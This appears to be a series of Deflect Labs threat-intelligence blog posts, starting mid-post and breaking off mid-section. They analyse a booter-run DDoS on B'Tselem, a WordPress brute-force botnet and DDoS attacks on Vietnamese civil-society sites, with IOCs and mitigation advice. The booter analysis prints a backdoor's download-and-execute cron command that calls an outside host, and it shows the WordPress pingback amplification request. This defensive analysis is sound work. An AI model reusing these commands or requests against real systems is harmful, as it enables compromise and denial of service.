The proposed future of Deflect monitoring is the Deflect Labs Information Sharing and Analysis Centre (DL-ISAC). The underlying idea behind this project, summarised in the schematic below, is to split the Baskerville engine into separate User Module and Clearinghouse components (dealing with log processing and model development, respectively), to enable a complete separation of personal data from the centralised modelling. Users would process their own web logs locally, and send off feature vectors (devoid of IP and host site details) to receive a prediction. This allows threat-sharing without compromising personally identifiable information (PII). In addition, this separation would enable the adoption of the DL-ISAC by a much broader range of clients than the Deflect-hosted websites currently being served. Increasing the user base of this software will also increase the amount of browsing data we are able to collect, and thus the strength of the models we are able to train.
Baskerville is an open-source project, with its first release scheduled next quarter. We hope this will represent the first step towards enabling a new era of crowd-sourced threat information sharing and mitigation, empowering internet users to keep their content online in an increasingly hostile web environment.
Figure 6:A schematic of the proposed structure of the DL-ISAC. The infrastructure is split into a log-processing user endpoint, and a central clearinghouse for prediction, analysis, and model development.
A Final Word: Bias in AI
In all applications of machine learning and AI, it is important to consider sources of algorithmic bias, and how marginalised users could be unintentionally discriminated against by the system. In the context of web traffic, we must take into account variations in browsing behaviour across different subgroups of valid, non-bot internet users, and ensure that Baskerville does not penalise underrepresented populations. For instance, checks should be put in place to prevent disadvantaged users with slower internet connections from being banned because their request behaviour differs from those users that benefit from high-speed internet. The Deflect Labs team is committed to prioritising these considerations in the future development of the DL-ISAC.
We identified a DDoS attack against the Israeli human rights website www.btselem.org on the 2nd of November
Attackers used three different type of relays to overload the website and were automatically mitigated by Deflect
We identified the booter infrastructure (professional DDoS service) and accessed and analyzed its tools, which we describe in this article
In cooperation with Digital Ocean, Google and other security response teams, we have managed to shut down some of the booter’s infrastructure running on their platforms. The booter is still operational however and continues to create new machines to launch attacks.
Introduction
On the 2nd of November 2018, we identified a DDoS attack against the Deflect-protected website www.btselem.org. B’Tselem is an Israeli non-profit organisation striving to end Israel’s occupation of the Palestinian territories. B’Tselem has been targeted by DDoS attacks many times in the past, including in 2013 and 2014, also when using Deflect protection in 2016. The organization has been facing pressure from the Israeli government for years, as well as from sectors of the Israeli public.
The attack on the 2nd of November was orchestrated from a booter infrastructure. A booter (also known as DDoSer or Stresser) is a DDoS-for-hire service with prices starting from as low as 15 dollars a month. Some services can support a huge number of DDoS attacks, like the booter vDoS (taken down in August 2017 by the Israeli police) which did more than 150 000 DDoS attacks and raised more than $600 000 over two years of activity. Now, the threat is taken seriously by police in many countries, leading to the dismantling of several booter services.
This attack is one of seventeen that we identified targeting the B’Tselem website in 2018. Most of the web attacks were using standard security audit tools such as Nikto, SQLMap or DirBuster launched from different IPs in Israel. All discovered DDoS attacks were using botnets to amplify the traffic load. The attack investigated in this report is the first example of a WordPress pingback attack against the btselem.org website in 2018.
In this article, we analyze the attack, including the tools and methods used by the booter.
Description of the Attack
On November 2nd, between midnight and 1am UTC, we identified an unusual peak of traffic to www.btselem.org. A large number of requests did not have any user-agent string or used a user-agent showing a WordPress pingback request (like WordPress/4.8.7; [REDACTED]; verifying pingback from 174.138.13.37). We confirmed that this traffic is part of a DDoS effort using different types of relays. We have documented pingback attacks several times in the past and explain what they are in the 3rd Deflect Labs report.
btselem.org received 341 435 requests to / during that period of time, including 272 624 requests without user-agent, 65 887 requests with UA Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36 and 2368 requests with different WordPress user-agents.
One interesting aspect of this traffic is that it targeted the domain btselem.org. This domain is configured to redirect to https://www.btselem.org through a 301 redirect HTTP code, but only a small part of the traffic actually followed the redirection and queried the final www website. We got 272,636 requests without user-agent on btselem.org during the attack, and only 34,035 on www.btselem.org.
The idea is to abuse the WordPress pingback feature which is built to notify websites when they are being mentioned or linked-to, by another website. The source publication contacts the linked-to WordPress website, with the URL of the source. The linked-to website then replies to confirm receipt. By sending the initial pingback request with the target website as the source, it is possible to abuse this feature and use the WordPress website as a relay for a DDoS attack. To counter this threat, many hosting providers have disabled pingbacks overall, and the WordPress team has implemented an update to add the IP address at the origin of the request in the User-Agent from version 3.9. An attack using the website www.example.com as a relay would see user-agents like WordPress/3.5.1; http://www.example.com before the version 3.9, and WordPress/3.9.16; http://www.example.com; verifying pingback from ORIGIN_IP after. Unfortunately, many WordPress websites are not updated and can still be used as relay without displaying the source IP address.
By analyzing the WordPress user-agents during the attack, it is easy to map the websites used as relays :
2368 requests were from WordPress websites
These requests were coming from 300 different WordPress websites used as relays
149 of them where above the version 3.9
The user-agents of WordPress websites over 3.9 shows the IPs at the origin of the attack : WordPress/4.1.24; http://[REDACTED]; verifying pingback from 178.128.244.42.
We identified 10 IPs as the origin of these attacks, all hosted on Digital Ocean servers which reveals the actual infrastructure of the booter. We describe hereafter the infrastructure identified and the actions we took to shut it down.
Analyzing other queries
The other part of the DDoS attack is a large number of requests to / without any query-string, also without either user-agent (272 624 requests) or with user-agent Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36 (65 887 requests).
By analyzing samples of these IPs, we identified many of them as open proxies. For instance, we received 159 requests from IP 213.200.56[.]86, known to be an open proxy by several open proxy databases. We checked the X-Forwarded-For header which is set by some proxies to identify the origin IP doing the request, and identified again the same list of 10 Digital Ocean IPs at the source of the attack.
Finally, a small part of these requests remained from unknown sources until we discovered the Joomla relay list on the booter servers (see after). A common Joomla plugin called Google Maps2 has a vulnerability disclosed since 2013 that allows using it as a relay. It has been used several times for DDoS, especially around 2014. It is surprising to see such an old vulnerability being used, but we identified only 2678 requests which show that this attack is not very effective in 2018, likely due to small number of websites still vulnerable.
Anatomy of a Booter
Infrastructure
As described earlier, the analysis of WordPress PingBack user-agents and of X-Forwarded-For header from proxies gave us the following list of IP addresses, all hosted on Digital Ocean :
178.128.244.42
178.128.244.184
178.128.242.66
178.128.249.196
142.93.136.67
188.166.26.137
188.166.43.4
188.166.105.145
174.138.13.37
188.166.125.216
These 10 servers were running an Apache http server on port 80 with an open index file showing a list of tools used by the booters for DDoS attacks :
This open directory allowed us to download most of the tools and list of relays used by the booters.
Toolkit
We were able to download most of the tools used by the booter at the exception of PHP code files (the files being executed when the URL is requested). Overall we can see three types of files hosted on the booter :
Command files in php : api.php and sockhit.php
Tools : executable or javascript tools like http.js or joomla
Text files listing relays :joomla.txt,path.txt,perfect.txt,socks.txt andxmlrpc.txt
Unprotected Commands
We could not download these php files (sockhit.php and api.php), but we could quickly deduce that they were used to remotely command the booter server from the interface to launch attacks.
One interesting thing to notice, is that the sockhit.php file does not seem to require authentication, which means that the infrastructure could have been used by other people unknowingly of the owners. We think that these PHP files are not directly launching the attacks but rather using the different tools deployed on the server to do that.
Backdoored Tools
The following tools were found on the server :
https.js a206a42857be4f30ea66ea17ce0dadbc
joomla 1956fc87a7217d34f5bcf25ac73e2d72a1cae84a
jsb.js b3a55eeb8f70351c14ba3b665d886c34
xmlrpc 480e528c9991e08800109fa6627c2227
We reversed both the xmlrpc and joomla file, and discovered that the joomla binary is actually backdoored. The file contains the real joomla executable from byte 0x2F29, upon execution the legitimate program is dumped into a temporary file (created with tmpnam), then a crontab is added by opening /etc/cron.hourly/0 and adding the line wget hxxp://r1p[.]pw/0 -O- 2>/dev/null| sh>dev/null 2>&1. The backdoor then opens itself and checks if it already contains the string h3dNRL4dviIXqlSpCCaz0H5iyxM= contained in the backdoor. If it does not contain the string, it will backdoor the file. Finally, it executes the legitimate program with the same arguments.
The final payload (5068eacfd7ac9aba6c234dce734d8901) takes as arguments (target) (list) (time) (threads), then read the list file to get the list of Joomla websites and query it with raw socket and the following HTTP query :
HEAD /%s%s HTTP/1.1
Host: %s
User-agent: Mozilla/5.0
Connection: close
The xmlrpc binary (480e528c9991e08800109fa6627c2227) is working in the same way (and is not backdoored) : Upon execution, the user has to provide a target website along with a list of WordPress websites in a file, a number of seconds for the attack and a number of threads ({target} {file} {seconds} {threads}). The tool then iterate over the list of WordPress website in multiple threads for the given duration, doing the following requests to the website :
POST /%s HTTP/1.0
Host: %s
Content-type: text/xml
Content-length: %i
User-agent: Mozilla/4.0 (compatible: MSIE 7.0; Windows NT 6.0)
Connection: close
<methodCall><methodName>pingback.ping</methodName><params><param><value><string>%s</string></value></param><param><value><string>%s</string></value></param></params></methodCall>
https.js and jsb.js are both Javascript tools forked from the cloudscaper tool which allows to bypass Cloudfare anti-DDoS Javascript challenge by solving the challenge server side and bypassing the protection. We don’t really know how it is used by the booter.
These jsb.js file contains the following line, which was likely done to prevent attack from this tool on the Turkish Hacker forum DarbeTurk but was partially deleted then :
The following list of relays where used on the server :
joomla.txt : contains 1226 Joomla websites having a Google Maps plugin vulnerable to relaying
path.txt : list of 2117 open proxies
perfect.txt : list of 1000 open proxies
socks.txt : list of 37849 open proxies
xmlrpc.txt : list of 9072 WordPress websites
As said earlier, it is surprising to see 1226 Joomla website with a vulnerable Google Maps plugin, while this vulnerability was identified and fixed in 2014. We queried the 1226 urls to check if the php page was still available and found that only 131 of them over 1226 still exist today. It explains the small number of requests identified from this type of relay in the attack, and shows that the tools and list used are quite outdated.
Summary
This booter relies on three different DDoS methods, all using different relays :
WordPress pingback attacks
Joomla Google Maps plugin vulnerability
Open proxies
The attacks we have seen from this booter where not very effective and were automatically mitigated by Deflect. The back-doored joomla file and the jsb.js Javascript tool (with a reference to a Turkish hacker forum) let us think that we have here a very amateur group that reused different tools shared on hacker forums, and imply a low technical skill level.
Tracking the booter’s infrastructure
A few days after we downloaded the tools, we saw the index page of all the servers change to a very simple html file containing only ‘kekkkk’ and although the tools were still available we were not able to see the list of files on the servers. As this string is a specific signature, we used Censys and BinaryEdge to track the creation of new servers by looking for IPs returning the same specific string.
Between mid-November and mid December, we have seen the booter using both Vultr and Google Cloud Platform. Overall we have identified 65 different IPs used by the operators, with a maximum of 17 at a single time.
We sent abuse requests to these companies, the two Google Cloud servers were shortly taken down after our email (we have no information if it is related to our abuse request or not). We contacted Vultr abuse team several times and they took down the booter infrastructure in mid-December. We sent an abuse request to Digital Ocean when we discovered the attack. Several days after we managed to get in touch with the incident response team that investigated more on this infrastructure. After discussions with them, they took down the infrastructure in December, but the operator quickly started new Digital Ocean servers that are still up at the time of the publication of this report.
Impact on Deflect protected websites
This DDoS attack was automatically mitigated by Deflect and did not create any negative impact on the targeted website.
Conclusion
People operating this booter have been identified by the Digital Ocean security team. However, without an official complaint and a legal enforcement request, the booter continues to operate creating new infrastructure for launching their attacks.
Booters have been around for a long time and even if several groups have been taken down by police (like the infamous Webstresser.org), this attack shows that the threat is still real. The analysis of the tools presented here seems to show that low skills are sufficient to run a booter service simply by reusing tools published on different hacker forums. Even so, an attack from this amplitude would be enough to take down a small to medium sized website without adapted DDoS protection.
We hear regularly about DDoS attacks coming from booters hosted on ecommerce websites, or game platforms, but this incident is also another reminder that civil society organization are a frequent victim of these same booters.
Indicators of Compromise
Original servers used by the booter (all Digital Ocean IPs):
178.128.244.42
178.128.244.184
178.128.242.66
178.128.249.196
142.93.136.67
188.166.26.137
188.166.43.4
188.166.105.145
174.138.13.37
188.166.125.216
md5 of the files available on the booter’s servers :
a206a42857be4f30ea66ea17ce0dadbc https.js
cf554c82438ca713d880cad418e82d4f joomla
a21e6eaea1802b11e49fd6db7003dad0 joomla.txt
b3a55eeb8f70351c14ba3b665d886c34 jsb.js
9263a09767e1bad0152d8354c8252de9 path.txt
5214cbb3fc199cb3c0c439aedada0f2a perfect.txt
db8ee68a81836cde29c6d65a1d93a98d socks.txt
480e528c9991e08800109fa6627c2227 xmlrpc
ea2c3ee7ac340c25a9b9aa06c83d0b6e xmlrpc.txt
Acknowledgment
We would like to thank the different incident response teams that have had to deal with our constant emails, Censys, ipinfo.io and BinaryEdge for their tools.
We identified traffic from thousands of IPs trying to brute-force WordPress websites protected by Deflect using the same user-agent (Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0) since September 2017
We confirmed that it was not only targeting Deflect protected websites, but targeting also a large number of websites over Internet
We analyze in this blog post the origin IPs of this botnet, mostly coming from IP addresses located in China.
Introduction
In August 2018, we identified several attempts of brute-forcing WordPress websites protected by Deflect. These attacks were all using the same user-agent, Firefox version 52 on Windows 7 (Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0). By retracing similar attacks with this user-agent, we discovered a large number of IP addresses involved in these attacks on over more than hundred of Deflect protected websites since September 2017.
Presentation of an Attack
An example of an attack from this botnet can be found in the traffic we observed on a Deflect protected website on the 24th of May with the user agent `Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0` :
At first one IP, 125.65.109.XXX (AS38283 – CHINANET) enumerated the list of authors of the WordPress website :
Then 168 different IP addresses were used to brute-force the password by doing POST queries to /wp-login.php :
Targeting beyond Deflect Users
The botnet’s large target list quickly made us think that it was not part of a political operation or a targeted attack, but rather an attempt to compromise any website available on the Internet. To confirm our hypothesis, we decided to share indicators of these attacks within threat intelligence groups as well as the GreyNoise platform to see if honeypots were targeted.
Shared Threat Intelligence
We shared indicators of attacks to other members of an Information Sharing and Analysis Center (ISAC) we are part of. Two members confirmed having seen the same attacks on their professional and personal websites. One of the members accepted to share logs and IP addresses with us, which confirmed the same type of attack with the same user-agent.
Using GreyNoise data
We used both the open and enterprise access of the GreyNoise platform to gather more data about this botnet. GreyNoise is a threat intelligence platform that focus on identifying the attack noise online through a large network of honeypots in order to differentiate targeted attacks from non-targeted attacks. (We got access to the Enterprise platform after an eQualit.ie member contributed to the development of tools for GreyNoise platform). GreyNoise works by gathering information on IPs that are scanning any GreyNoise’s honeypot, and tagging them based on the type of scan identified. We can see quickly in the GreyNoise visualizer that many IPs are identified as WORDPRESS_WORM :
We enumerated the list of IP addresses listed as WORDPRESS_WORM, and then queried detailed information for each IP in order to identify the one using the Firefox 52 user-agent characteristic of this botnet. We identified 725 different IP addresses from this data set among the last 5000 WordPress scanners available through the Enterprise API.
These two pieces of information confirm that this botnet is targeting websites far beyond the websites we protect with Deflect.
Analysis of the traffic to Deflect
We identified the first query from this botnet on Deflect websites on the 27th of September 2017. We have graphed the number of requests done by this botnet to /wp-login.php over time :
Looking more closely at the distribution of number of requests per IP addresses, we see that a small number of IP addresses are doing a large number of requests :
Analysis of the botnet
We identified 3148 unique IPs belonging to this botnet from the following sources :
3011 targeting Deflect protected websites since September 2017
725 identified by GreyNoise as WordPress
7 from logs shared by people from different communities
Checking the origin Autonomous Systems, we can see that 39% of the IPs come from the AS 4134 (Chinanet backbone) and 4837 (China169) :
342 ASN4837 CHINA169-BACKBONE CHINA UNICOM China169 Backbone, CN
93 ASN9808 CMNET-GD Guangdong Mobile Communication Co.Ltd., CN
87 ASN18881 TELEFÔNICA BRASIL S.A, BR
86 ASN8452 TE-AS TE-AS, EG
82 ASN9498 BBIL-AP BHARTI Airtel Ltd., IN
50 ASN17974 TELKOMNET-AS2-AP PT Telekomunikasi Indonesia, ID
48 ASN3462 HINET Data Communication Business Group, TW
47 ASN4766 KIXS-AS-KR Korea Telecom, KR
40 ASN24445 CMNET-V4HENAN-AS-AP Henan Mobile Communications Co.,Ltd, CN
If we look at the origin countries of these IP’s, we see that 53% of them are based in China :
1654 China
171 Brazil
168 India
102 Russia
94 Indonesia
87 Egypt
82 Republic of Korea
65 United States
62 Taiwan
43 Vietnam
We queried ipinfo.io to get the type of Autonomous Systems these IP’s are part of :
2743 : Internet Service Providers
271 : Business
132 : Hosting
2 : Unknown
Our findings show that the large majority of these systems are coming from networks providing Internet to people through smartphones, computers or other weird Internet of Things devices.
To identify the operating system of these bots, we used another interesting feature of GreyNoise, which is the identification of the operating system at the origin of these requests through passive fingerprinting techniques (using p0f signatures). By querying all the IPs from this botnet in GreyNoise and filtering on the one using the Firefox 52 user agent, we checked which operating systems these IPs used (1370 IP’s from our list were identified in GreyNoise with Firefox 52 user agent) :
662 unknown
238 Linux 2.6
209 Linux 2.4.x
88 Linux 3.1-3.10
63 Linux 2.4-2.6
51 Linux 2.2-3.x
17 Linux 3.11+
12 Linux 2.2.x-3.x (Embedded)
9 Linux 3.x
8 Mac OS X 10.x
6 Windows 7/8
4 FreeBSD
1 Linux 2.0
1 Windows 2000
1 Windows XP
We see here that 50% of these IP are identified as Linux systems, mostly with old Linux kernels (2.4 or 2.6). Our conclusion is that this botnet is mostly comprised of compromised routers, Internet of Thing devices, or Android smartphones (Android uses the Linux kernel).
Another interesting fact shown by GreyNoise data is that over these IPs, 2105 were also identified for other of types scans, mostly for the following suspicious activities :
WEB_SCANNER_LOW: 1404,
SSH_SCANNER_LOW: 1037
SSH_WORM_LOW: 950
WEB_CRAWLER: 705
TELNET_SCANNER_LOW: 117
TELNET_WORM_HIGH: 80
SSH_WORM_HIGH: 77
HTTP_ALT_SCANNER_LOW: 52
SMB_SCANNER_LOW: 44
SSH_SCANNER_HIGH: 33
We have used this data to map the activity identified by GreyNoise over time, first only for the WordPress brute-force traffic, then second for any suspicious activity :
We can see that this botnet is not used only to attack WordPress or that most of these devices are compromised by more than one malware.
Impact on Deflect
We have not identified any impact from this botnet on Deflect protected websites. The first reason is that any heavy traffic going beyond the threshold defined in our Banjax rules would automatically ban the IP for some time. A large part of the traffic from this botnet was actually blocked automatically by Deflect.
The second reason is that most websites using Deflect use the Banjax admin page protection, which requires an extra shared password to access administrator parts of a website (for WordPress, /wp-admin/)
Protection Against Bruteforce
The WordPress documentation describes several ways to protect your website against such brute-force attacks. The first one is to use a strong password, preferable a passphrase that would resist dictionary attacks used most of the time.
It is also possible to add an extra password (a bit like Banjax does) to the administration part of your website by using HTTP authentication. See the WordPress documentation for more information. (If you choose this option, it is recommended to install a tool preventing HTTP brute-force like fail2ban).
For professional WordPress hosting, a strong counter-measure to these attacks is to separate WordPress’ live PHP code from rendered WordPress code by hosting the administration part of the website on a different domain (for instance using django-wordpress). We plan to implement this strategy on our own WordPress hosting in the coming months.
Conclusion
In this blog post, we have described a botnet targeting WordPress website all around the world. The number of devices part of the attack is quite large (more than 3000), which shows that it is a well organized activity. We have no information on the malware used to compromise these devices or on the objective of this group. We are definitely interested to be in touch with anyone having more information about this group, or interest in continuing this investigation. Please contact us at outreach AT equalit.ie.
Appendix
Acknowledgement
We would like to thank member of the NGO ISAC, ipinfo.io and the Greynoise.io team for their support.
Indicators Of Compromise
You can look for the following indicators in your traffic :
User-Agent : Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0
url: POST /wp-login.php and GET /?author=1 (testing authors between 1 and 60)
We have no information on the post-compromise actions.
As with our last report, we have to not share public IP addresses used by this botnet, as they are likely compromised systems and we cannot control the potential side-effect of sharing these IP to owners of these systems. We are open to share them privately. We are aware of the challenges for sharing DDoS threat intelligence and we are also interested in starting a discussion about this topic. Please contact us at outreach AT equalit.ie.
We identified 10 different DDoS attacks targeting two Vietnamese websites protected by Deflect, viettan.org and baotiengdan.com, between the 17th of April and 15th of June 2018. These attacks happened in the context of an important lack of Internet Freedom in Vietnam with regular online attacks against activists and independent media.
We sorted these attacks in four different groups sharing the same Tactics, Techniques, and Procedures (TTPs). Group A is comprised of 6 different attacks, against both viettan.org and baotiengdan.com, which tend to show that these two websites have common enemies even if they have different political perspectives.
We found common IPs between this group and a DDoS attack analyzed by Qurium in June 2018 against Vietnamese independent media websites luatkhoa.org and thevietnamese.org. Having four different Vietnamese civil society websites targeted by DDoS in the same period supports the hypothesis that these attacks are part of a coordinated action to silence NGOs and independent media in Vietnam.
For each of the attacks covered in this report, we have investigated their origin and the systems used as relays.
Introduction
This blog post is the first in a series called “News from Deflect” intended to describe attacks on Deflect protected websites, with the objective of continuing discussions about distributed denial of service (DDoS) attacks against civil society.
Deflect is a free DDoS mitigation service for civil society organizations (see our Terms of Service to understand who fits into this description). Our platform is filtering traffic between users and civil society websites to remove malicious requests, in this case, bots trying to overload systems in order to make the website unavailable and silence political groups or independent media.
We have been protecting two Vietnamese websites, viettan.org and baotiengdan.com on the Deflect platform. Việt Tân is an organization seeking to establish democracy through political reforms in Vietnam. Tiếng Dân is an independent online non-partisan media covering political news in Vietnam.
Over the past several months, we have seen a significant increase of DDoS attacks against these two websites. Although Việt Tân and Tiếng Dân websites and organizations are not related to each other by any means and have different political perspectives, our investigations uncovered several attacks targeting them simultaneously. It appeared to us that these attacks are driven by a coordinated campaign and sought the websites’ agreement to publish an overview of the discovered activities.
Figure 1: heatmap of DDoS incidents against Việt Tân and Tiếng Dân websites over the past months
Internet and Media Freedom in Vietnam
For a more than a decade, there has been proof of online attacks against Vietnamese civil society. The earliest attacks we know focused on silencing websites either with DDoS attacks, like the attacks against the Bauxite Vietnam website in December 2009 and January 2010 or against Việt Tân in August 2011, or by compromising their platforms, as witnessed with Anh Ba Sam in 2013.
In 2013, the discovery by Citizen Lab of FinFisher servers installed in Vietnam indicated malware operations against activists and journalists. In March 2013, the managing editor of baotiengdan.com, Thu Ngoc Dinh, at that time managing editor of Anh Ba Sam, had her computer compromised and her personal pictures published online. Later that year, the Electronic Frontier Foundation documented a targeted malware operation against Vietnamese activists and journalists. This attack is now attributed to a group called OceanLotus (or APT32) that is considered to be Vietnam-based. Recently, an attack targeting more than 80 websites of civil society organizations (Human rights, independent media, individual bloggers, religious groups) was uncovered by Volexity in November 2017 and attributed to this same Ocean Lotus group.
At the same time, there is a strong suppression of independent media in Vietnam. Several articles in the Vietnamese constitution criminalize online publications opposing the Socialist Republic of Vietnam. They have been used regularly to threaten and condemn activists, like the blogger Nguyen Ngoc Nhu Quynh, alias ‘Mother Mushroom’ who was sentenced to 10 years in jail for distorting government policies and defaming the communist regime in Facebook posts in June 2017. Recently, Vietnamese legislators approved a cyber-security law requiring large IT companies like Facebook or Google to store locally personal data on users in Vietnam. This law has seen strong opposition by street protests and by human rights groups like Human Rights Watch and Amnesty International.
Since the 17th of April 2018, we have identified 10 different DDoS attacks targeting either Việt Tân or Tiếng Dân’s websites :
Date
Target
1
2018/04/17
viettan.org
2
2018/04/17
baotiengdan.com
3
2018/05/04
viettan.org
4
2018/05/09
viettan.org
5
2018/05/09
baotiengdan.com
6
2018/05/23
baotiengdan.com
7
2018/06/07
baotiengdan.com
8
2018/06/10
baotiengdan.com
9
2018/06/12
viettan.org
10
2018/06/15
baotiengdan.com
These attacks were all HTTP flood attacks but came from different sources and with different characteristics (user agents, path requested etc.).
Identifying Groups of Attacks
From the beginning of the analysis, we saw some similarities between the different attacks, mainly through the user agents used by different bots, or the path requested. We quickly wanted to identify groups of attacks sharing the same Tactics, Techniques and Procedures (TTP).
We first described their characteristics in the following table :
id
Target
Start time
End Time
#IP
#Hits
Path
User Agent
Query String
1
viettan.org
2018-04-17 08:20:00
2018-04-17 09:10:00
294
63 830
/
On random UA per IP
None
2
baotiengdan.com
2018-04-17 8:30:00
2018-04-17 10:00:00
568
33 589
/
One random UA per IP
None
3
viettan.org
2018-04-28 00:00:00
2018-05-04 15:00:00
5001
2 257 509
/ or /spip.php
Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)
if spip, /spip.php?page=email&id_article=10283
4
viettan.org
2018-05-09 02:30:00
2018-05-09 03:20:00
217
58 271
/
One UA per IP
None
5
baotiengdan.com
2018-05-09 08:30:00
2018-05-09 11:30:00
725
235 157
/
One or several UA per IP
None
6
baotiengdan.com
2018-05-23 15:00:00
2018-05-24 09:30:00
557
2 957 065
/
One random UA per IP
None
7
baotiengdan.com
2018-06-07 01:45:00
2018-06-07 05:30:00
70
17 131
/
One random UA per IP
None
8
baotiengdan.com
2018-06-10 05:45:00
2018-06-11 06:30:00
349
5 214 730
/
python-requests/2.9.1
?&s=nguyenphutrong and random like
9
viettan.org
2018-06-12 05:00:00
2018-06-12 06:30:00
1
9 978
/
329 different user agents
Random like ?x=%99%94%7E%85%7B%7E%8D%96
10
baotiengdan.com
2018-06-15 13:00:00
2018-06-15 23:00:00
1
518 899
/
python-requests/2.9.1
?s=nguyenphutrong
From this table, we can see that Incidents 8 and 10 clearly use the same tool identified by the user agent (python-requests/2.9.1) and do the same specific query /?&s=nguyenphutrong based on the name of Nguyễn Phú Trọng, the current General Secretary of the Communist Party of Vietnam. We gathered these two attacks in Group C.
Incidents 3 and 9 have different characteristics from other incidents, they seem to use two different custom-made tools for DDoS. We separated them into two different groups, B and D (see details in part 2).
We still have 6 different attacks that share common characteristics but not enough to confirm any linkages between them. They all query / without any query string, which is quite common in DDoS attacks. They use random User-Agents for each IP address, which is close to what legitimate traffic looks like.
Identifying shared IPs
We wanted to check if these different attacks were sharing IP addresses so we represented both IPs and Incidents in a Gephi graph to visualize the links between them (IPs are represented with red dots and incidents with green dots in the following figure) :
We have identified six incidents sharing common IPs in their botnets, and present them in the following table of Incident intersection IPs:
incidents
Number of IPs
Intersection IP
% of total botnet IPs
6 & 1
557 & 294
5
1.70 %
6 & 4
557 & 217
6
2.76 %
6 & 7
557 & 70
3
4.29 %
6 & 5
557 & 725
8
1.44 %
6 & 2
557 & 568
1
0.18 %
1 & 4
294 & 217
1
0.46 %
1 & 7
294 & 70
2
2.86 %
1 & 5
294 & 725
9
3.06 %
1 & 2
294 & 568
155
52.72 %
4 & 7
217 & 70
2
2.86 %
4 & 5
217 & 725
14
6.45 %
4 & 2
217 & 568
1
0.46 %
7 & 5
70 & 725
1
1.43 %
7 & 2
70 & 568
1
1.43 %
5 & 2
725 & 568
22
3.87 %
There is a strong overlap of bots used in Incidents 1 and 2 (53%), which is telling considering that Incident 1 is targeting viettan.org and incident 2 is targeting baotiengdan.com. Its is a strong indication that a similar botnet was used to attack these two domains, particularly as the attacks were orchestrated at the same on April 17th.
Other attacks all share between 1 and 22 IP addresses in common (<10%) which is a quite small percentage of intersection and may have different explanations. For instance, the same system is compromised by several different malware turning them into bots, or that different compromised systems are behind the same public IP.
Identifying origin countries
Another link to consider is if these IPs used for different attacks are from the same countries. If we consider a botnet that would use specific ways to infect end systems, it is likely that they would be unevenly distributed over the world. For instance a phishing attack in one language would be more efficient in a country speaking this language, or an Internet wide scan for vulnerable routers would compromise more devices in countries using the targeted router.
We have geolocated these IPs using MaxMind GeoLite database and represented the origin in the following graph (countries having less than 5% IPs are categorized as “Other” for visibility) :
Besides Incident 7, these attacks clearly share the same profile : between 15 and 30% of IPs are from India, between 5 and 10% from Indonesia, then Philippines or Malaysia. Surprisingly, the 7th incident has only one IP coming from India (categorised as Other in this graph) but has a similar distribution in other countries. So the distribution seems quite similar.
Analyzing User-Agents
Another interesting characteristic of these attacks is that every IP is using a single user agent for all of its requests, presumably selected from a list of predefined user-agents. We listed User-Agents used in different incidents and checked the similarity between these lists :
incidents
Number of UA
Number of identical UA
Percentage
6 & 2
68 & 40
29
72.50 %
6 & 1
68 & 54
32
59.26 %
6 & 5
68 & 97
40
58.82 %
6 & 4
68 & 57
32
56.14 %
6 & 7
68 & 38
34
89.47 %
2 & 1
40 & 54
23
57.50 %
2 & 5
40 & 97
27
67.50 %
2 & 4
40 & 57
17
42.50 %
2 & 7
40 & 38
27
71.05 %
1 & 5
54 & 97
32
59.26 %
1 & 4
54 & 57
29
53.70 %
1 & 7
54 & 38
28
73.68 %
5 & 4
97 & 57
34
59.65 %
5 & 7
97 & 38
31
81.58 %
4 & 7
57 & 38
24
63.16 %
Between 42 and 81% of user-agents are shared between every set of two incidents. Low intersections between two incidents could be due either to different versions of the same tool used in different attacks, or to interference with legitimate traffic.
15 different user agents were used in all of the 6 incidents:
User-Agent
Description
Mozilla/5.0 (Windows NT 5.1; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36
Chrome 53 on Windows 10
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36
Chrome 53 on Windows 7
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
Chrome 45 on Windows 7
Mozilla/5.0 (Windows NT 6.3; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0
Firefox 41 on Windows 8.1
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36
Chrome 63 on Windows 10
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0
Firefox 41 on Windows 7
Mozilla/5.0 (Windows NT 6.0) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Chrome 13 on Windows Vista
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36
Chrome 53 on Mac OS X (El Capitan)
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:13.0) Gecko/20100101 Firefox/13.0.1
Firefox 13 on Windows 7
Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.02
Firefox 5 on Windows 7
Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36
Chrome 63 on Windows 7
Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36
Chrome 53 on Windows 10
Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Internet Explorer 11 on Windows 7
Analyzing Traffic Features
